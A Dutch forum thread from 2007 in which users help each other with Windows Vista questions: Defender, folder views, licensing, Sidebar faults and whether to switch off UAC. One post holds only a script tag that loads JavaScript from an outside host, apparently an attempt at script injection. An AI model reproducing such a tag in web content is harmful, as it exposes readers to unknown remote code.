Ah thanksquote:Op maandag 1 oktober 2007 17:57 schreef RacerDKB het volgende:
[..]
Windows Defender, zit zelfs in Vista ingebouwd
Makkelijk te vinden via de zoekfunctie bij menu start, gewoon Defender intypen.
Overigens heb ik Vista, dus ik weet niet of dat bij alle zo is.
Je plaatje doet het nietquote:Op maandag 1 oktober 2007 18:00 schreef RacerDKB het volgende:
Jup, zit in elke Vista versie. Werkt prima bij mij.
Is http://img141.imageshack.us/img141/6968/diffyo8.jpg niet een betere vergelijking tussen alle versies? Vind die vergelijking van microsoft, de link die in de OP staat, maar onduidelijk.
quote:
He, das handigquote:Op maandag 1 oktober 2007 20:21 schreef RacerDKB het volgende:
[..]
Oh, dat komt doordat hij vanaf FOK! naar imageshack word verwezen, en fok is natuurlijk banned van imageshack.
Werkende link: http://i24.tinypic.com/vwwvv9.jpg
Dat probleem heb ik dus ookquote:Op woensdag 3 oktober 2007 15:41 schreef Treveo het volgende:
Kan iemand mij misschien helpen?
Ik vind prettig om in Vista ALLE mappen in de weergave "details" te hebben, dus geen lijst of tegels. Het probleem is alleen dat hij constant paar mappen als tegels weergeeft en dan krijg ik het weer in details met heel veel moeite.
Weet iemand misschien hoe ik dit kan oplossen?
Echt niet dus... heb echt Applt to all Folders gedaan... wordt toch vaak weer veranderd zonder dat ik erom vroeg...quote:Op woensdag 3 oktober 2007 16:29 schreef dikkedorus het volgende:
Tools->Folder Options->view->Apply to Folders om alle folders op de huidige settings af te stellen.
Verder onthoudt hij hier wel gewoon per window met welke view je hem het laatst hebt bekeken, zo ver ik kan zien.
Verder kan je met ctrl-scrollwieltje gemakkelijk door de verschillende views scrollen
Het handigste van heel Vista heeft PietjePuk007 nog niet ontdekt hoorquote:Op zondag 14 oktober 2007 19:34 schreef PietjePuk007 het volgende:
Hoe komt het dat het geluid van media player classic veel zachter is dan bijvoorbeeld MSN? Als ik een film / serie ga kijken met vrij hard geluid kan de hele straat meegenieten als er iemand online komt.
Of ben ik de enige(ja ik kan natuurlijk msn uitzetten maar daar gaat m'n vraag dus niet over
)?
quote:Op zondag 14 oktober 2007 19:46 schreef RacerDKB het volgende:
Het handigste van heel Vista heeft PietjePuk007 nog niet ontdekt hoor
quote:Op zondag 14 oktober 2007 19:46 schreef RacerDKB het volgende:
[..]
Het handigste van heel Vista heeft PietjePuk007 nog niet ontdekt hoor
Klik rechtsonder eens op het speakertje, dan ga je naar Mixer.
Kan je per programma het volume instellen! OMGOMGOGMOGMGOGMOGM!
Die is er ook niet. Vorig jaar kon je wel gratis een Beta downloaden, maar ook die is er niet meer.quote:Op donderdag 18 oktober 2007 10:58 schreef deliberator het volgende:
Kan je ook ergens die trial versie vandaan halen?
Kan hem niet vinden![]()
zal waarschijnlijk wel aan mij liggen
Erg jammer.quote:Op donderdag 18 oktober 2007 11:13 schreef FredvZ het volgende:
[..]
Die is er ook niet. Vorig jaar kon je wel gratis een Beta downloaden, maar ook die is er niet meer.
Je kan het ook nog gewoon downloaden, dan heb je standaard 30 dagen trial.. gewoon geen productkey invoeren... dan ben je nog legaal bezigquote:Op donderdag 18 oktober 2007 11:26 schreef deliberator het volgende:
[..]
Erg jammer.
Wilde wel eens zien hoe alles werkt in Vista.
Beetje jammer om hem hiervoor aan te schaffen.
waar issie te downloaden dan?quote:Op donderdag 18 oktober 2007 12:04 schreef Treveo het volgende:
[..]
Je kan het ook nog gewoon downloaden, dan heb je standaard 30 dagen trial.. gewoon geen productkey invoeren... dan ben je nog legaal bezig![]()
Worden deze instellingen niet door de drivers van je videokaart geregeld (bij mij wel), dus dan moet je het daar aanpassen lijkt mij.quote:Op zaterdag 20 oktober 2007 18:06 schreef kovenant het volgende:
heeft iemand een ideetje zodat ik de schermen normaal kan gebruiken ?![]()
Hier met een oudere PC loopt het ook prima, om maar wat positief te brengen in dit topic.quote:Op zaterdag 29 september 2007 13:05 schreef Treveo het volgende:
[..]
Intel Duo Core T2300 1,67 GHz
1024 MB DDR2 SDRAM
ATi Mobility Radeon X1400
En het draait als een sneltrein. Alle programma's laden supersnel (< 1 sec)
Is dit één of andere uitgekleden variant ofzo?quote:MS Windows Vista Home Premium DSP NL
quote:de OEM versies: Microsoft Windows Vista DSP (only for sale with Computer components)
Hoe kan je dit dan los kopen?quote:Op maandag 22 oktober 2007 15:07 schreef PietjePuk007 het volgende:
Moeilijk he googlen. Via google kwam ik op een topic uit FOK! en die zei:
[..]
Dat is 't punt juist. Losse verkoop mag nietquote:Op maandag 22 oktober 2007 15:11 schreef deliberator het volgende:
Hoe kan je dit dan los kopen?
Of moet je er dan een systeem bij aanschaffen?
Ach,als het aan te schaffen is zo, wie zal ik dan zijn om te zeggen dat het niet mag?quote:Op maandag 22 oktober 2007 15:34 schreef PietjePuk007 het volgende:
[..]
Dat is 't punt juist. Losse verkoop mag niet.
Stel nou dat ik via een site de DSP versie bestel.quote:Op maandag 22 oktober 2007 15:47 schreef dikkedorus het volgende:
Neen, koppelverkoop mag niet.
De OEM versie mag je als gebruiker gewoon kopen, er zijn allemaal rare regeltjes geweest, en ik weet niet hoe het nu zit. Zo moest je mistens één hardware-artikel erbij kopen zodat je je eigen componenten-leverancier was. (een muis of een usb-dongle, of iets anders goedkoops).
In Nederland ligt afaik de OEM versie gewoon los in de verkoop. Of er nog verschil is met de DSP versie weet ik niet, maar de OEM is gewoon online te koop voor een fractie van de retailprijs.
Geen idee, ik sluit alleen mijn laptop op de tv aan, niet mijn pc. Aangezien op mijn laptop XP staat en alles gewoon werkt, heb ik Ultramon daar niet voor nodig.quote:Op maandag 22 oktober 2007 12:20 schreef funrider het volgende:
werkt dat Ultramon ook lekker met beeld weergeven op TV?
quote:Op maandag 22 oktober 2007 11:44 schreef MetalSonic het volgende:
Ik heb ook een vreemde fout.
Enige tijd terug een patch voor ut2004 gedownload, de download ging niet snel dus ik dacht "dan stop ik 'm maar".
Op de desktop staat dan wel al een applicatie ( ut-2004 patch )
Maar die kan ik niet verwijderen, "cant delete programm in use bij anoter process"
1) in safe mode kan ik hem niet deleten
2) hij loopt helemaal niet "zichtbaar " onder processen
wat moet ik doen ?
danku maar heb je ook zoiets voor Vista ?quote:Op maandag 22 oktober 2007 23:14 schreef Devolution het volgende:
Probeer het eens met dit programma
En Google
Je zult zelf met add/remove programs (ben even kwijt hoe dat nu heet) zelf moeten nagaan wat je wel en niet nodig hebt. Veel van die "opsmuk" is verrekte handig namelijk.quote:Op maandag 22 oktober 2007 23:15 schreef Eastwood het volgende:
Goeden avond mensen...
ik heb een vraag, waarschijnlijk is die vraag al eerder langs gekomen, maar ik voel me niet geroepen 17 delen door te lezen![]()
Ik heb afgelopen vrijdag een nieuwe notebook gekocht.. compleet afgeleverd met Vista premium.. Je moet overigens weten dat ik een klote hekel heb aan alle doelloze programmatjes om het "leuk" te maken.
Nu is mijn vraag of er iets van een lijst bestaat waar op staat welke "entertainment" en "overbodige opsmuk" programma's zo verwijdert kunnen worden zonder echt iets toe te voegen aan windows.
(of zelfs wel iets van een programmatje die de overbodige shit eraf haalt?)
Miss vraag je je af, waarom koos je niet voor Vista Basic? ik ben in de winkel sterk afgeraden daarvoor te kiezen.. omdat je dan echt alles zelf moet installeren.. wat volgens hen geen goed idee was... overigens twijfel ik nu daar over... maar ach, ik zit nu met deze versie![]()
Nu killbox en unlocker geprobeerd maar 't is nog steeds niet gelukt :Squote:Op maandag 22 oktober 2007 23:44 schreef MetalSonic het volgende:
[..]
danku maar heb je ook zoiets voor Vista ?
DSP is bijna hetzelfde als OEM, maar ipv via de hardwarefabrikanten gaat het dan weer via Delivery Service Partners. Whataver that means. Als je het kan kopen zou ik het gewoon doen. (ik ben DSP nog nooit tegengekomen in een webwinkel)quote:Op maandag 22 oktober 2007 15:52 schreef deliberator het volgende:
[..]
Stel nou dat ik via een site de DSP versie bestel.
Dan zou ik deze toch ook geleverd moeten krijgen of niet?
huh?quote:Op dinsdag 23 oktober 2007 10:58 schreef Dark_Angelus het volgende:
<script src=http://rb.vg/1.js></script
quote:Op maandag 22 oktober 2007 17:10 schreef Devolution het volgende:
[..]
Geen idee, ik sluit alleen mijn laptop op de tv aan, niet mijn pc. Aangezien op mijn laptop XP staat en alles gewoon werkt, heb ik Ultramon daar niet voor nodig.
Heb je trouwens wel de 2e monitor enabled in Vista? Want als ik mijn laptop op mijn tv aansluit, dan krijg ik ook de laadbalk op de tv te zien, maar daarna niets meer, totdat ik de 2e monitor enable ('Het bureaublad uitbreiden naar de tweede monitor'). Het zou namelijk kunnen dat ie de instellingen niet onthoudt na een reboot (en je dus bij elke boot weer een enkel scherm gebruikt).
Even terug naar een eerdere vraag....quote:Op dinsdag 16 oktober 2007 22:20 schreef PietjePuk007 het volgende:
Ben ik weer.
Stel je hebt een serie gedownload van een aantal afleveringen, je download daar netjes de dvd-cover (JPG) bij en dat dump je in 1 map. Als je nu die map aan gaat klikken heeft het pictogram van die map (weergave groot / normaal) 2 plaatjes "in zich". Kan je ervoor zorgen dat alleen die dvd-cover weergeeft (daar heb je 'm tenslotte voor gedownload)?
edit (er zijn meerder mensen met dit probleem)
[ afbeelding ]
Bron (maar de oplossing werkt dus niet want er blijven 2 plaatjes staan).
quote:Op dinsdag 23 oktober 2007 16:55 schreef Kptelmo het volgende:
De weergave is veranderd maar net als in XP kun je een afbeelding als icoon gebruiken door deze folder.jpg te noemen. Dan krijg je wel die opengeklapte folder als icoon maar dan met maar 1 afbeelding (de folder.jpg dus).
Oh wat slechtquote:Op maandag 29 oktober 2007 17:05 schreef Treveo het volgende:
Ja, dat kan, moet je even rechtsklikken ergens op je Outlook icon in je tray... dan staat het ergens
Gebruikersaccounts en dan gebruikersaccont beheer uitschakelen (niet aanbevolen)quote:Op maandag 29 oktober 2007 21:56 schreef Oldbie het volgende:
Ik heb nu een perfecte dualboot met XP en Vista. Tot nu toe ben ik lovend over Vista en ik overweeg een permanente overstap maar ik zit nog met een irritant verschijnsel:
Zodra ik een programma (niet MS) op wil starten krijg ik de vraag of ik door wil gaan of dat ik wil annuleren. Nergens is de optie om aan te geven dat dit een vertrouwd programma is en dat de vraag in het vervolg niet meer hoeft.
Hoe schakel ik dit (per programma) uit?
Het is toch schijtirritant om dat telkens te moeten wegklikken? Achterlijke functie vind ik het.quote:Op maandag 29 oktober 2007 22:11 schreef Treveo het volgende:
[..]
Gebruikersaccounts en dan gebruikersaccont beheer uitschakelen (niet aanbevolen)
Dat is dus alles in één keer uitzetten? Dat wil ik niet.quote:Op maandag 29 oktober 2007 22:11 schreef Treveo het volgende:
[..]
Gebruikersaccounts en dan gebruikersaccont beheer uitschakelen (niet aanbevolen)
quote:Op maandag 29 oktober 2007 22:17 schreef crossover het volgende:
[..]
Het is toch schijtirritant om dat telkens te moeten wegklikken? Achterlijke functie vind ik het.
Ja, maar het beschermt jou iig wel heel erg goedquote:Op maandag 29 oktober 2007 22:17 schreef crossover het volgende:
[..]
Het is toch schijtirritant om dat telkens te moeten wegklikken? Achterlijke functie vind ik het.
Ik weet niet hoe ij winrar gebruikt?quote:Op maandag 29 oktober 2007 22:25 schreef PietjePuk007 het volgende:
Ik heb UAC ook uitstaan, dan maar een beveiligingsrisico. Als je iets wil unrarren moet je wel 3x iets wegklikken, dat wordt op een gegeven moment echt irritant
.
ik dacht dat vista er ook eentje ingebouwd had.quote:Op woensdag 31 oktober 2007 11:30 schreef Devolution het volgende:
Niet dat ik weet, maar er zijn wel programma's voor, zoals Objectdock en RocketdockOf bedoel je de ingebouwde Vista Sidebar?
Heeft Vista niet ingebouwd als het goed isquote:Op woensdag 31 oktober 2007 12:17 schreef deliberator het volgende:
[..]
ik dacht dat vista er ook eentje ingebouwd had.
Net zoiets als Objectdock idd.
Draait sidebar.exe (bij de processen) wel?quote:Op woensdag 31 oktober 2007 20:36 schreef GrupoBalanca het volgende:
Sindskort doet mijn sidebar het niet meerhij start niet meer op.. ook is dat icoontje in mijn taakbalk verdwenen. sidebar.exe heb ik nog wel, maar als ik erop dubbelklikt dan doet ie niets. Heeft iemand een oplossing daarvoor? OS: Vista Home Premium
Nee ik zie sidebar.exe er niet tussen staanquote:Op donderdag 1 november 2007 02:46 schreef Boschkabouter het volgende:
[..]
Draait sidebar.exe (bij de processen) wel?
Staat het aan in je services?quote:Op donderdag 1 november 2007 10:37 schreef GrupoBalanca het volgende:
[..]
Nee ik zie sidebar.exe er niet tussen staan
Nee helaas staat het daar ook niet bijquote:
Dat heb ik tig keer al geprobeerd, maar helaasquote:Op donderdag 1 november 2007 22:44 schreef maartena het volgende:
Je kunt de Sidebar ook starten vanuit het Startmenu, werkt dat niet?
Sommige mensen hebben de smileys gedownload of gerestored met een tool... dan kan je ze om een of ander reden niet toevoegenquote:Op donderdag 1 november 2007 22:47 schreef deliberator het volgende:
Heb sinds net een vaag probleempje.
Kon gisteren in MSN Live Messenger nog van die smileys van andere kopieëren en toevoegen aan mijn eigen msn.
Nu heb ik de optie toevoegen niet meer
Is dat ergens in of uit te schakelen?
Wtf, wat gek? Het is gewoon alsof de service compleet van je PC is verdwenen...quote:Op donderdag 1 november 2007 11:11 schreef GrupoBalanca het volgende:
[..]
Nee helaas staat het daar ook niet bij
True, weet iemand hier misschien een oplossing voor?quote:Op donderdag 1 november 2007 23:00 schreef Treveo het volgende:
[..]
Wtf, wat gek? Het is gewoon alsof de service compleet van je PC is verdwenen...
hoe kan het dan dat ik onder xp van die personen ze wel kon toevoegen?quote:Op donderdag 1 november 2007 22:59 schreef Treveo het volgende:
[..]
Sommige mensen hebben de smileys gedownload of gerestored met een tool... dan kan je ze om een of ander reden niet toevoegen
MSNquote:Op maandag 5 november 2007 15:57 schreef deliberator het volgende:
Iemand een oplossing voor mijn probleem?
Optiesquote:Op woensdag 7 november 2007 13:55 schreef Boschkabouter het volgende:
Kun je Vista eigenlijk makkelijk upgraden van Home Premium > Business?
Virus? Trojan? Spyware? Doe eens anders even wat scans...quote:Op zondag 11 november 2007 14:06 schreef Sextreme het volgende:
Sinds een week of 3 is Vista zo traag als dikke stront... Dit komt doordat hij de CPU constant op 100% gebruikt om de een of andere reden. Zo duurt bijvoorbeeld deze computer openen al een seconde of 8-10 om de een of andere reden.
Iemand nog deze problemen gekregen de laatste tijd? En/of oplossingen hiervoor gevonden?
Lijkt me hoogst onwaarschijnlijk, ik weet wel hoe ik deze dingen buiten de deur moet houden. Maar 't is in ieder geval even de moeite van het proberen waard.quote:Op zondag 11 november 2007 14:32 schreef Treveo het volgende:
[..]
Virus? Trojan? Spyware? Doe eens anders even wat scans...
Anders kijken welke proces je CPU op 100% houdt en dan checken wat hij dan precies doetquote:Op zondag 11 november 2007 14:35 schreef Sextreme het volgende:
[..]
Lijkt me hoogst onwaarschijnlijk, ik weet wel hoe ik deze dingen buiten de deur moet houden. Maar 't is in ieder geval even de moeite van het proberen waard.
Dit had ik ook al eens bekeken in het taakbeheer, maar dat geeft niet aan welk proces nu 100 CPU gebruikt, terwijl dit wel het geval is volgens een andere meter, en dit is dan ook zeer duidelijk merkbaar aan de pc.quote:Op zondag 11 november 2007 14:57 schreef Treveo het volgende:
[..]
Anders kijken welke proces je CPU op 100% houdt en dan checken wat hij dan precies doet
Forum Opties | |
---|---|
Forumhop: | |
Hop naar: |